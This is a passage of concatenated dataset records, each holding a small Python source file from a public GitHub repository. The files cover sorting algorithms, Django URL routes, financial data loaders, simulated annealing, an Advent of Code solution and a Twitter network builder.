)\n]","repo_name":"francbartoli/gee-bridge","sub_path":"rest_social/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"70921874987","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('new', views.create_company, name='create_company'),\n path('settings', views.company_settings, name='company_settings'),\n path('savecompany', views.save_company_name),\n path('edit', views.edit_company, name='edit_company'),\n path('subscription', views.view_subscription, name='subscription'),\n path('customers', views.customer_dashboard, name='customer_dashboard'),\n path('customers/new', views.new_customer, name='new_customer'),\n path('customers/info/', views.each_customer),\n path('customers/edit/', views.edit_customer),\n path('customers/delete/', views.delete_customer),\n path('customers/download', views.download_customers, name='download_customers'),\n path('shipping-carriers', views.shipping_carriers_dashboard, name='shipping_carriers_dashboard'),\n path('shipping-carriers/new', views.new_shipping_carrier, name='new_shipping_carrier'),\n path('shipping-carriers/info/', views.each_shipping_carrier),\n path('shipping-carriers/edit/', views.edit_shipping_carrier),\n path('shipping-carriers/delete/', views.delete_shipping_carrier),\n path('shipping-carriers/download', views.download_shipping_carriers, name='download_shipping_carriers')\n]\n","repo_name":"DeveloperDaksh/Recipe_calculator","sub_path":"company/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16164961393","text":"#quicksort\ndef qsort(arr, left, right):\n if (left < right):\n #divide array in two \"unequal\" parts, smaller elements on left\n pos = part(arr, left, right)\n #sort the left side recursively\n qsort(arr, left, pos - 1)\n #sort the right\n qsort(arr, pos + 1, right)\n \ndef part(arr, left, right):\n #array is unsorted, pick the rightmost element as a pivot\n #everything \"smaller\" than pivot will move to left\n pivot = arr[right]\n #sp points to last element moved\n sp = left - 1\n \n for i in range(left, right):\n if (arr[i] < pivot):\n sp += 1\n (arr[i], arr[sp]) = (arr[sp], arr[i])\n pos = sp + 1\n (arr[pos], arr[right]) = (arr[right], arr[pos])\n return pos\n ","repo_name":"jcfuhrmann/Ioss_Python","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18570929772","text":"#!/usr/bin/python\n# python script showing battery details \nimport subprocess\nimport notify2\nimport psutil \nfrom playsound import playsound\n\n# function returning time in hh:mm:ss \ndef convertTime(seconds): \n\tminutes, seconds = divmod(seconds, 60) \n\thours, minutes = divmod(minutes, 60) \n\treturn \"%d:%02d:%02d\" % (hours, minutes, seconds) \n\nclass bat_warn():\n def __init__(self):\n self.warn = False\n # returns a tuple\n self.battery = psutil.sensors_battery() \n \n def sound_play(self):\n playsound('/usr/lib/slack/resources/flitterbug.mp3')\n \n def prcnt_get(self):\n return self.battery.percent\n\n def plugged_get(self):\n return self.battery.power_plugged\n\n def note_show(self, val):\n notify2.init(\"Battery Warning\")\n n = notify2.Notification(\"Battery has reached {}%, disconnect charger!\".format(val), icon=\"\")\n n.set_urgency(notify2.URGENCY_NORMAL)\n n.set_timeout(5000)\n n.show()\n\n\ninst = bat_warn()\n\nif inst.prcnt_get()>= 80 and \\\n inst.plugged_get() == True and \\\n inst.warn == False:\n inst.sound_play()\n inst.note_show(80)\n inst.warn = True\nelse:\n if inst.plugged_get() == True: \n inst.warn = False\n\n print(\"percentage: {:.2f}% plugged: {}\".format(inst.prcnt_get(),inst.plugged_get()))\n","repo_name":"stdcerr/bat_shielder","sub_path":"bat_shielder.py","file_name":"bat_shielder.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17361728947","text":"from typing import List\n\nimport logging\nimport yfinance as yf\nfrom tqdm import tqdm\nimport pandas as pd\n\nfrom .base import ColumnNameHandler\n\n\ndef load_daily_returns(list_of_tickers: List[str], min_date: str, max_date: str) -> pd.DataFrame:\n \"\"\"\n Function to load daily return for the specified list of tickers and dates from Yahoo Finance.\n\n Parameters\n ----------\n list_of_tickers : List[str]\n List of tickers to load\n min_date : str\n Date to load the returns from\n max_date : str\n Date to load the return untill\n\n Returns\n -------\n pd.DataFrame\n Dataframe with ticker, Ret and Date columns\n \"\"\"\n returns_df = list()\n # Keep only one-token tickers (otherwise, will fall with error) and keep only unique\n list_of_tickers = set([t for t in list_of_tickers if len(t.split())==1])\n for t in tqdm(list_of_tickers):\n # Load stock data daily\n ticker_df = yf.download(t, min_date, max_date)\n # If no data available - skip the ticker\n if 'Adj Close' not in ticker_df or ticker_df.empty:\n logging.getLogger(__name__).info(f\"Could not load return for ticker {t}. Skipping it.\")\n continue\n \n # Calculate daily returns as a percentage change\n ticker_df.loc[:, ColumnNameHandler.ret_col] = ticker_df['Adj Close'].pct_change()\n # Remove Nan values\n ticker_df.dropna(inplace=True)\n ticker_df.reset_index(inplace=True)\n # Append ticker name as a new column\n ticker_df.loc[:, ColumnNameHandler.ticker_col] = t\n returns_df.append(ticker_df[[\n ColumnNameHandler.ticker_col, \n ColumnNameHandler.date_col, \n ColumnNameHandler.ret_col, \n ColumnNameHandler.volume_col\n ]].copy())\n if not returns_df:\n return None\n # Combine all returns together\n returns_df = pd.concat(returns_df, axis=0)\n returns_df.dropna(axis=1, inplace=True)\n returns_df.reset_index(inplace=True, drop=True)\n returns_df[ColumnNameHandler.date_col] = pd.to_datetime(returns_df[ColumnNameHandler.date_col]).dt.date\n return returns_df\n\n\ndef load_daily_factors(five_factors: bool = False) -> pd.DataFrame:\n \"\"\"\n Function to load daily factors from Fama-Franch public library.\n\n Parameters\n ----------\n five_factors : bool, optional\n Whether to load five factors or three factors instead, by default False\n\n Returns\n -------\n pd.DataFrame\n Dataframe with loaded factors per date\n \"\"\"\n website_url = \"https://mba.tuck.dartmouth.edu/pages/faculty/ken.french/ftp\"\n if five_factors:\n url_to_factors = f'{website_url}/F-F_Research_Data_5_Factors_2x3_daily_CSV.zip'\n else:\n url_to_factors = f'{website_url}/F-F_Research_Data_Factors_daily_CSV.zip'\n # First 3 rows show meta data - thus, skip it\n ff_df = pd.read_csv(url_to_factors, skiprows=3)\n # Original index is Date - thus, in the file it will be unnamed. Change it.\n ff_df.rename({'Unnamed: 0': 'Date'}, axis=1, inplace=True)\n ff_df.loc[:, 'Date'] = pd.to_datetime(ff_df['Date'].astype(str), errors='coerce').dt.date\n # There could be a footer with metadata - make sure to drop it\n ff_df.dropna(axis=0, inplace=True)\n return ff_df\n","repo_name":"Darenar/easy-event-study","sub_path":"easy_es/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72517106666","text":"'''Criar um algoritmo para calcular o salario congforme a qunatidade de horas '''\n'''\ndeclarando variaveis\n'''\ngerente = \"gerente\"\nsupervisor = \"supervisor\"\noperador= \"operador\"\nfabrica = \"fabrica\"\nescritorio = \"escritorio\"\nsalario = 0\n\nnome = input(\"Informe o nome do Funcionario : \")\ncargo = input('Informe o cargo de '+nome+' : ')\nlocal = input('Informe o local onde '+nome+' trabalha : ')\nquantHora = float(input(\"Informe a quantidade de horas trabalhadas : \"))\n\nif cargo == gerente :\n if local == escritorio:\n salario = quantHora * 70.00\n else:\n if local == fabrica:\n salario = quantHora * 80.00\n else:\n print(\"O local informado é invalido\")\nelse:\n if cargo == supervisor:\n if cargo == escritorio:\n salario = quantHora * 50.00\n else:\n if local == fabrica:\n salario = quantHora * 60.00\n else:\n print(\"O local informado é invalido\")\n else:\n if cargo == operador:\n if local == fabrica:\n salario = quantHora * 40.00\n else:\n print(\"O local informado é invalido\")\n else:\n print(\"O cargo informado é invalido\")\nif salario != 0:\n print(\"O salario de \", nome, \" é : \", salario)\n","repo_name":"FlavioAlvesDS/listas-de-exercicios-em-Python","sub_path":"EstruturaDeRepetição/cargoSalario.py","file_name":"cargoSalario.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72722835627","text":"from copy import deepcopy\nimport logging\nimport numpy as np\nfrom numpy.random import rand, randn\n\nfrom pog.algorithm.utils import *\nfrom pog.graph.graph import Graph\n\nfrom pog.algorithm.params import STEP_SIZE, MAX_ITER, MAX_TEMP, TEMP_COEFF, \\\n NUM_CYCLES_EPS, NUM_CYCLES_STEP, NUM_CYCLES_TEMP, EPS_THRESH, MAX_STEP_SIZE\n\n\n# simulated annealing algorithm\ndef simulated_annealing(\n objective,\n sg: Graph,\n node_id=None,\n random_start=False,\n verbose=False,\n method='standard',\n):\n \"\"\"simulated annealing algorithm to maximum stability.\n\n\t\tNOTE: This function is only for scene graph with max depth = 2\n\n\tArgs:\n\t\tobjective (list): a list of objective functions\n\t\tsg (Graph): scene graph\n\t\tnode_id (list, optional): a list of nodes to be optimized. Defaults to None.\n\t\trandom_start (bool, optional): Randomly select initial configuration. Defaults to False.\n\t\tverbose (bool, optional): More outputs. Defaults to False.\n\n\tReturns:\n\t\tbest: best configuration\n\t\tbest_eval: cost of best configuration\n\t\"\"\"\n if method == 'adaptive':\n return adaptive_simulated_annealing(objective,\n sg,\n node_id,\n random_start=random_start,\n verbose=verbose)\n\n if node_id is not None:\n pose = sg.getPose(edge_id=node_id)\n else:\n pose = sg.getPose()\n object_pose_dict, bounds = gen_bound(pose)\n\n # generate an initial point\n if random_start:\n best = bounds[:, 0] + rand(len(bounds)) * (bounds[:, 1] - bounds[:, 0])\n else:\n best = pose2arr(pose, object_pose_dict, [])\n\n # evaluate the initial point\n best_eval, _ = objective[0](best, object_pose_dict, sg)\n # current working solution\n curr, curr_eval = best, best_eval\n\n # run the algorithm\n t = MAX_TEMP\n best_eval_arr = []\n history = []\n for i in range(MAX_ITER):\n # take a step\n step_direction = randn(len(curr)) # Gaussian\n # step_direction = 2. * (rand(len(curr)) - 0.5) # Uniform\n candidate = curr + step_direction / np.linalg.norm(\n step_direction) * STEP_SIZE\n\n # evaluate candidate point\n pose = arr2pose(candidate, object_pose_dict, pose)\n sg.setPose(pose)\n candidate_eval, _ = objective[0](candidate, object_pose_dict, sg)\n # difference between candidate and current point evaluation\n diff = candidate_eval - curr_eval\n\n # calculate temperature for current epoch\n t = t * TEMP_COEFF\n\n # calculate metropolis acceptance criterion\n metropolis = np.exp(min(-diff / t, 700.)) # <- avoid overflow\n\n # check for new best solution\n if candidate_eval < best_eval:\n # store new best point\n best, best_eval = candidate, candidate_eval\n # report progress\n if verbose:\n best_tmp = [float(\"{:.4f}\".format(x)) for x in list(best)]\n logging.debug('>{} f({}) = {:.4f}, temp: {:.4f}'.format(\n i, best_tmp, best_eval, t))\n\n best_eval_arr.append(diff)\n if len(best_eval_arr) > NUM_CYCLES_EPS and (abs(\n np.array(best_eval_arr[-NUM_CYCLES_EPS:])) <\n EPS_THRESH).all():\n break\n\n # check if we should keep the new point\n if diff < 0 or rand() < metropolis:\n # store the new current point\n curr, curr_eval = candidate, candidate_eval\n\n return best, best_eval\n\n\ndef adaptive_simulated_annealing(objective,\n sg: Graph,\n node_id=None,\n random_start=False,\n verbose=False):\n\n if node_id is not None:\n pose = sg.getPose(edge_id=node_id)\n else:\n pose = sg.getPose()\n object_pose_dict, bounds = gen_bound(pose)\n\n # generate an initial point\n if random_start:\n best = bounds[:, 0] + rand(len(bounds)) * (bounds[:, 1] - bounds[:, 0])\n else:\n best = pose2arr(pose, object_pose_dict, [])\n\n # evaluate the initial point\n best_eval = objective[0](best, object_pose_dict, sg)\n # current working solution\n curr, curr_eval = best, best_eval\n\n eval_arr, counts_cycles, counts_resets = [], 0, 0\n n = len(curr)\n a = np.zeros(n)\n step_vector = MAX_STEP_SIZE * np.ones(n)\n c = 0.1 * np.ones(n)\n t = MAX_TEMP\n # run the algorithm\n i = 0\n while i < 5000:\n i += 1\n for iter in range(n):\n step = np.zeros(n)\n step[iter] = 2 * (rand() - 0.5) * step_vector[iter]\n temp = curr + step\n temp_eval = objective[0](temp, object_pose_dict, sg)\n diff_temp_eval = temp_eval - curr_eval\n if diff_temp_eval < 0 or rand() < np.exp(-diff_temp_eval / t):\n curr, curr_eval = temp, temp_eval\n a[iter] += 1.\n if curr_eval < best_eval:\n best, best_eval = curr, curr_eval\n\n counts_cycles += 1\n if counts_cycles <= NUM_CYCLES_STEP: continue\n\n counts_cycles = 0\n step_vector = corana_update(step_vector, a, c, NUM_CYCLES_STEP)\n a = np.zeros(n)\n counts_resets += 1\n if counts_resets <= NUM_CYCLES_TEMP: continue\n\n t *= TEMP_COEFF\n counts_resets = 0\n eval_arr.append(curr_eval)\n if not (len(eval_arr) > NUM_CYCLES_EPS and eval_arr[-1] - best_eval <= EPS_THRESH and \\\n (abs((eval_arr[-1] - np.array(eval_arr))[-NUM_CYCLES_EPS:])<= EPS_THRESH).all()):\n curr, curr_eval = best, best_eval\n if verbose:\n best_tmp = [float(\"{:.4f}\".format(x)) for x in list(best)]\n print('>{} f({}) = {:.4f}, temp: {:.4f}'.format(\n i, best_tmp, best_eval, t))\n\n else:\n break\n\n return [best, best_eval]\n\n\ndef corana_update(v, a, c, ns):\n for i in range(len(v)):\n ai, ci = a[i], c[i]\n\n if ai > 0.6 * ns:\n v[i] *= (1 + ci * (ai / ns - 0.6) / 0.4)\n elif ai < 0.4 * ns:\n v[i] /= (1 + ci * (0.4 - ai / ns) / 0.4)\n\n return v\n","repo_name":"zyjiao4728/POG-Demo","sub_path":"pog/algorithm/annealing.py","file_name":"annealing.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"73405994348","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n #result array and subset array\n res = []\n\n subset = []\n def dfs(i):\n if i >= len(nums):\n res.append(subset.copy())\n return \n \n #left tree\n subset.append(nums[i])\n dfs(i + 1)\n\n #right tree\n subset.pop()\n dfs(i + 1)\n \n dfs(0)\n return res","repo_name":"Astovall9900/Leetcode","sub_path":"0078-subsets/0078-subsets.py","file_name":"0078-subsets.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3249534271","text":"# Day11.py\n#\n# First attempt at doing Day 11 of Advent of Code 2022\n\nimport sys\nsys.path.append(\"..\")\n\nfrom perf import calc_perf\nfrom math import lcm\nfrom functools import reduce\n\nclass Monkey(object):\n def __init__(self):\n self.items = []\n self.new_iter = []\n self.post_opt = []\n self.val = 0\n self.operation = []\n self.inspected = 0\n\n def test(self, item): # Does the test for Part 1\n new_val = item // 3\n if new_val % self.val == 0:\n return new_val, self.post_opt[0]\n else:\n return new_val, self.post_opt[1]\n\n def test2(self, item): # Does the test for Part 2\n if item % self.val == 0:\n return item, self.post_opt[0]\n else:\n return item, self.post_opt[1]\n\n def perform_opt(self, item):\n if self.operation[0] == '+':\n item += int(self.operation[1])\n elif self.operation[0] == '*':\n if self.operation[1] == 'old':\n item *= item\n else:\n item *= int(self.operation[1])\n return item\n\n\ndef read_input(file_name):\n with open(file_name, 'r') as f:\n read_list = f.read().splitlines()\n read_list = [line.split(': ') for line in read_list]\n\n gen_list = []\n\n for line in read_list:\n if line[0].lstrip().startswith('Monkey'):\n curr_monkey = Monkey()\n gen_list.append(curr_monkey)\n elif line[0].lstrip().startswith('Starting items'):\n for item in line[1].split(', '):\n curr_monkey.items.append(int(item))\n elif line[0].lstrip().startswith('Operation'):\n splited_lines = line[1].split(' ')\n curr_monkey.operation = [splited_lines[-2],splited_lines[-1]]\n elif line[0].lstrip().startswith('Test'):\n curr_monkey.val = int(line[-1].split(' ')[-1])\n elif line[0].lstrip().startswith(\"If\"):\n curr_monkey.post_opt.append(int(line[1][-1]))\n\n return gen_list\n\ndef cycle(input_list):\n # Perform passes\n for monkey in input_list:\n items_to_pop = len(monkey.items)\n for item in monkey.items:\n new_item = monkey.perform_opt(item)\n val, pass_to = monkey.test(new_item)\n input_list[pass_to].items.append(val)\n monkey.inspected += 1\n for idx in range(0, items_to_pop):\n monkey.items.pop(0)\n\ndef cycle2(input_list, common_div):\n # Perform passes\n for monkey in input_list:\n items_to_pop = len(monkey.items)\n for item in monkey.items:\n new_item = monkey.perform_opt(item)\n val, pass_to = monkey.test2(new_item)\n input_list[pass_to].items.append(val%common_div)\n monkey.inspected += 1\n for idx in range(0, items_to_pop):\n monkey.items.pop(0)\n\ndef main():\n ## Part 1\n # b = read_input(\"Day11_test_input.txt\")\n b = read_input(\"Day11_input.txt\")\n\n for idx in range(0,20):\n cycle(b)\n # Debug:\n # for monkey in b:\n # print(f'{monkey.items}')\n #\n # print(f'Inspected:{[monkey.inspected for monkey in b]}')\n\n val = sorted([monkey.inspected for monkey in b], key=lambda x:-x)\n print(f'Monkey Business: {val[0]*val[1]}')\n\ndef main2():\n # Part 2\n # a = read_input(\"Day11_test_input.txt\")\n a = read_input(\"Day11_input.txt\")\n common_div = reduce(lcm,([i.val for i in a]))\n\n for idx in range(0,10000):\n cycle2(a, common_div)\n\n print(f'Inspected:{[monkey.inspected for monkey in a]}')\n val = sorted([monkey.inspected for monkey in a], key=lambda x:-x)\n print(f'Monkey Business: {val[0]*val[1]}')\n\nif __name__ == \"__main__\":\n ## Part 1\n calc_perf(main())\n\n ## Part 2\n calc_perf(main2())\n","repo_name":"jeremyleung521/Advent_of_Code2022","sub_path":"python/Day11/Day11.py","file_name":"Day11.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70579741547","text":"# 合并排序\n# 时间复杂度, 最坏情况, 最好情况, 空间复杂度\n# O(nlogn), O(nlogn), O(nlogn), O(n)\ndef merge(l, r):\n \"\"\"\n 合并的过程\n :param l:\n :param r:\n :return:\n \"\"\"\n new_list = []\n tag_l = 0\n tag_r = 0\n while tag_l < len(l) and tag_r < len(r):\n if l[tag_l] < r[tag_r]:\n new_list.append(l[tag_l])\n tag_l = tag_l + 1\n else:\n new_list.append(r[tag_r])\n tag_r = tag_r + 1\n if tag_l == len(l):\n for i in r[tag_r:]:\n new_list.append(i)\n elif tag_r == len(r):\n for j in l[tag_l]:\n new_list.append(j)\n return new_list\n\n\ndef merge_sort(ls):\n \"\"\"\n 归并排序,先拆分再合并\n 拆分过程\n 递归\n :param ls:\n :return:\n \"\"\"\n if len(ls) <= 1:\n return ls\n middle = int(len(ls) / 2)\n left = merge_sort(ls[:middle])\n right = merge_sort(ls[middle:])\n return merge(left, right)\n\n\nif __name__ == \"__main__\":\n a = [4, 7, 8, 3, 5, 9]\n\n print(merge_sort(a))","repo_name":"liying123456/python_leetcode","sub_path":"sort/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40427432627","text":"import time\nimport board\nimport adafruit_bmp3xx\n\ni2c = board.I2C()\nbmp = adafruit_bmp3xx.BMP3XX_I2C(i2c)\n\nbmp.pressure_oversampling = 4\n# bmp.temperature_oversampling = 1\nbmp.sea_level_pressure = 988\n\nn = 100\nsea_sum = 0\nfor _ in range(n):\n sea_sum += bmp.pressure\n time.sleep(0.01)\nbmp.sea_level_pressure = int(sea_sum/n)\n\nstart_time = time.time()\nsamples = 0\nwhile True:\n #print(\n # \"Pressure: {:6.4f} Temperature: {:5.2f}\".format(bmp.pressure, bmp.temperature)\n #)\n print('Pressure: {} Pascals'.format(bmp.pressure))\n print('Altitude: {} meters'.format(bmp.altitude))\n # time.sleep(1)\n print(f\"Sample Rate: {samples/(time.time() - start_time)}Hz\")\n samples += 1\n\n","repo_name":"noronhadaniel/ACS_2023","sub_path":"Examples/altimeter_bmp390.py","file_name":"altimeter_bmp390.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"74548502506","text":"\"\"\"\nFile: dataset.py\nAuthor: Binguan Liu\nDate: Dec 15, 2020\nBrief: Inerface of dataset\n\"\"\"\n\nimport os\nimport os.path as osp\nimport zipfile\nfrom typing import List, Tuple\n\n\ndef mkdir(output_dir : str) -> None:\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n\ndef zipdir(path, result_path):\n zipf = zipfile.ZipFile(result_path, \"w\")\n for root, dirs, files in os.walk(path):\n for file in files:\n zipf.write(\n osp.join(root, file),\n osp.relpath(osp.join(root, file), osp.join(path, '..'))\n )\n zipf.close()\n\n\ndef load_list(path : str) -> List[str]:\n \"\"\"load list from text file\"\"\"\n assert osp.exists(path), \"{} does not exist\".format(path)\n\n ret = []\n with open(path, \"r\") as f:\n for line in f:\n ret.append(line.strip())\n return ret\n\n\ndef load_leison_classes(path : str) -> Tuple[List[str], List[str]]:\n \"\"\"load retinal lesion classes info from text file\"\"\"\n assert osp.exists(path), \"{} does not exist\".format(path)\n\n classes = []\n classes_abbrev = []\n with open(path, \"r\") as f:\n for line in f:\n class_name, class_abbrev_name = line.strip().split(\",\")\n classes.append(class_name)\n classes_abbrev.append(class_abbrev_name)\n return classes, classes_abbrev\n","repo_name":"by-liu/SegLossBias","sub_path":"seglossbias/utils/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"25517464559","text":"print('-=-' * 20)\nprint('Calcular numeros impares e calcular que são multiplos de 3 de 1 À 50')\nprint('-=-' * 20)\n\nsoma = 0\ncont = 0\nfor c in range(1,501, +2):\n\n if (c % 3) ==0:\n cont = cont + 1\n soma += c\n # soma = soma + c\nprint('A Soma de todos {} os os solicitados é: {}'.format(cont,soma))\n","repo_name":"adriano-create/Exercicios-Python-Curso-em-V-deo","sub_path":"Ex048.py","file_name":"Ex048.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43214442004","text":"import networkx as nx\nfrom networkx.readwrite import json_graph\nfrom collections import defaultdict\nimport os\nfrom os.path import join, dirname\nimport sys\nimport uuid\nimport json\nfrom plotly.graph_objs import *\nfrom plotly import tools\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nimport argparse\nimport numpy\nfrom dotenv import load_dotenv\nimport csv\nimport warnings\nimport pandas\nimport json\nwarnings.filterwarnings('ignore')\n\n\nclass Network:\n\n def __init__(self, DIR, input_file, relationships,prune):\n\n self.DIR = DIR\n\n Array = []\n with open(input_file,'r',encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n try:\n for row in reader:\n Array.append(row)\n except Exception as e:\n print(e)\n df = pandas.DataFrame(Array[1:],columns=Array[0])\n #df = pandas.read_csv(input_file, encoding=\"utf-8\")\n \n if relationships == 'reply_to':\n if input_file.find('twitter-Tweet') != -1:\n df = df[['text','user.screen_name']].dropna()\n df['reply_to'] = df['text'].str.extract('^@([A-Za-z0-9-_]+)',expand=True)\n new_df = df[['reply_to','user.screen_name','text']].dropna()\n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['user.screen_name'], row[1]['reply_to'], text=row[1]['text'])\n\n elif input_file.find('twitter-Stream') != -1:\n df = df[['_source.text','_source.user.screen_name']].dropna()\n df['reply_to'] = df['_source.text'].str.extract('^@([A-Za-z0-9-_]+)',expand=True)\n new_df = df[['reply_to','_source.user.screen_name','_source.text']].dropna()\n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['_source.user.screen_name'], row[1]['reply_to'], text=row[1]['_source.text'])\n\n elif relationships == 'retweet_from':\n if input_file.find('twitter-Tweet') != -1:\n df = df[['text','user.screen_name']].dropna()\n df['retweet_from'] = df['text'].str.extract('RT @([A-Za-z0-9-_]+):',expand=True)\n new_df = df[['retweet_from','user.screen_name','text']].dropna()\n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['user.screen_name'],row[1]['retweet_from'], text=row[1]['text'])\n\n elif input_file.find('twitter-Stream') != -1:\n df = df[['_source.text','_source.user.screen_name']].dropna()\n df['retweet_from'] = df['_source.text'].str.extract('RT @([A-Za-z0-9-_]+):',expand=True)\n new_df = df[['retweet_from','_source.user.screen_name','_source.text']].dropna()\n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['_source.user.screen_name'],row[1]['retweet_from'], text=row[1]['_source.text'])\n \n elif relationships == 'mentions':\n \n if input_file.find('twitter-Tweet') != -1:\n df = df[['text','user.screen_name']].dropna()\n df['mentions'] = df['text'].str.findall('@([A-Za-z0-9-_]+)')\n tmp = []\n def backend(r):\n x = r['user.screen_name']\n y = r['text']\n zz = r['mentions']\n for z in zz:\n tmp.append({'screen_name':x, \n 'tweet':y,\n 'mention':z})\n df.apply(backend,axis=1)\n new_df = pandas.DataFrame(tmp).dropna()\n \n elif input_file.find('twitter-Stream') != -1:\n df = df[['_source.text','_source.user.screen_name']].dropna()\n df['mentions'] = df['_source.text'].str.findall('@([A-Za-z0-9-_]+)')\n tmp = []\n def backend(r):\n x = r['_source.user.screen_name']\n y = r['_source.text']\n zz = r['mentions']\n for z in zz:\n tmp.append({'screen_name':x, \n 'tweet':y,\n 'mention':z})\n df.apply(backend,axis=1)\n new_df = pandas.DataFrame(tmp).dropna()\n \n self.graph = nx.DiGraph()\n self.directed = 'directed'\n for row in new_df.iterrows():\n self.graph.add_edge(row[1]['screen_name'], row[1]['mention'], text=row[1]['tweet'])\n \n # prune the network or not\n if prune == 'isolates':\n for n in self.graph.nodes():\n if self.graph.degree()[n] <= 1:\n # check if its neighbour's total degree\n for neighbour in self.graph[n].keys():\n if self.graph.degree()[neighbour] <= 1:\n self.graph.remove_node(n)\n self.graph.remove_nodes_from(nx.isolates(self.graph))\n elif prune == 'weakly_connected':\n weak = nx.weakly_connected_components(self.graph)\n to_remove = []\n for n in weak:\n to_remove.append(list(n)[0]) \n self.graph.remove_nodes_from(to_remove)\n self.graph.remove_nodes_from(nx.isolates(self.graph))\n\n elif prune == 'influencer':\n for n in self.graph.nodes():\n if self.graph.in_degree()[n] == 0:\n self.graph.remove_node(n)\n \n \n \n \n def export_graph(self):\n # JSON format\n d3js_graph = json_graph.node_link_data(self.graph)\n d3js_graph['nodes'] = [\n {\n 'id':node['id'],\n 'connectivity':self.graph.in_degree()[node['id']] + self.graph.out_degree()[node['id']]\n }\n for node in d3js_graph['nodes']\n ]\n fname_d3js = self.DIR + '/d3js.json'\n with open(fname_d3js,\"w\") as f:\n json.dump(d3js_graph,f)\n print(fname_d3js)\n\n # Gehpi readable format\n fname_gephi = self.DIR + '/network.gml'\n nx.write_gml(self.graph,fname_gephi)\n print(fname_gephi)\n\n # Pajek format\n fname_pajek = self.DIR + '/network.net'\n nx.write_pajek(self.graph,fname_pajek)\n print(fname_pajek)\n \n\n def draw_graph(self,relationships,layout):\n\n if layout == 'spring':\n pos = nx.spring_layout(self.graph)\n elif layout == 'circular':\n pos = nx.circular_layout(self.graph)\n elif layout == 'fruchterman':\n pos = nx.fruchterman_reingold_layout(self.graph)\n elif layout == 'random':\n pos = nx.random_layout(self.graph)\n elif layout == 'shell':\n pos = nx.shell_layout(self.graph)\n elif layout == 'spectral':\n pos = nx.spectral_layout(self.graph)\n\n edge_attri = nx.get_edge_attributes(self.graph,'text')\n edge_trace = Scatter(x=[], y=[], text=[], line=Line(width=1,color='#b5b5b5'), hoverinfo='text',mode='lines',hoveron='points')\n for edge in self.graph.edges():\n x0, y0 = pos[edge[0]]\n x1, y1 = pos[edge[1]]\n edge_trace['x'] += [x0,x1,None]\n edge_trace['y'] += [y0,y1,None]\n edge_trace['text'].append(edge_attri[edge])\n \n node_trace = Scatter(x=[],y=[],text=[],mode='markers', hoverinfo='text',hoveron='points+fills',\n marker=Marker(\n showscale=True,\n # colorscale options\n # 'Greys' | 'Greens' | 'Bluered' | 'Hot' | 'Picnic' | 'Portland' |\n # Jet' | 'RdBu' | 'Blackbody' | 'Earth' | 'Electric' | 'YIOrRd' | 'YIGnBu'\n colorscale='Portland', reversescale=False, color=[],\n size=10,\n colorbar=dict(\n thickness=15,\n title='node connectivity',\n xanchor='left',\n titleside='right'\n ),\n line=dict(width=2)))\n for node in self.graph.nodes():\n x, y= pos[node]\n node_trace['x'].append(x)\n node_trace['y'].append(y)\n\n # label\n # if digraph\n if relationships == 'reply_to':\n for node in self.graph.nodes():\n node_trace['marker']['color'].append(self.graph.in_degree()[node] + self.graph.out_degree()[node])\n node_trace['text'].append(\"@\" + node + \" is replied by \" + str(self.graph.in_degree()[node]) + \" user(s), and replies to \" + str(self.graph.out_degree()[node]) + \" user(s)\")\n \n elif relationships == 'retweet_from':\n for node in self.graph.nodes():\n node_trace['marker']['color'].append(self.graph.in_degree()[node] + self.graph.out_degree()[node])\n node_trace['text'].append(\"@\" + node + \" is retweeted by \" + str(self.graph.in_degree()[node]) + \" user(s) and retweets from \" + str(self.graph.out_degree()[node]) + \" user(s)\")\n\n elif relationships == 'mentions':\n for node in self.graph.nodes():\n node_trace['marker']['color'].append(self.graph.in_degree()[node] + self.graph.out_degree()[node])\n node_trace['text'].append(\"@\" + node + \" is mentioned by \" + str(self.graph.in_degree()[node]) + \" user(s) and mentions \" + str(self.graph.out_degree()[node]) + \" user(s)\")\n \n fig 